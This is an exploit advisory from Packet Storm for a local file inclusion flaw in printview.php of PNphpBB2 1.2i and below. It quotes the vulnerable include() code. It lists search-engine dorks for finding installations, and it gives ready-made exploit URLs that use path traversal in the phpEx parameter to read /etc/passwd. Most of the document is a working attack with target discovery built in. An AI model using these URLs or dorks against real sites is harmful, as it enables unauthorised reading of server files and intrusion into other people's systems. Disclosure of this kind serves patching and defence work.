PNphpBB2 versions 1.2i and below suffer from a local file inclusion vulnerability in printview.php.
801cdc0ce7ee22d95ce54c9109c694b0ec0054420874fc44121ffa6f3d182703.-----------------------------------------------------------------------------.
| vuln.: PNphpBB2 <= 1.2i (printview.php phpEx) Local File Inclusion Vuln. |
| download: http://www.pnphpbb.com/ |
| dorks: Powered by PNphpBB2 / Powered por PNphpBB2 |
| inurl:"index.php?name=PNphpBB2" |
| |
| author: irk4z@yahoo.pl |
| homepage: http://irk4z.wordpress.com/ |
| |
| greets to: str0ke, wacky, polish under ;] |
'-----------------------------------------------------------------------------'
# code:
/printview.php:
...
define('IN_PHPBB', true);
$ModName = basename( dirname( __FILE__ ) );
$phpbb_root_path = './modules/' . $ModName . '/';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
...
LFI in $phpEx :D:D:D
# sploit:
http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=/../../../../../../../etc/passwd
http://[host]/[path]/modules/PNphpBB2/printview.php?phpEx=[ LFI ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed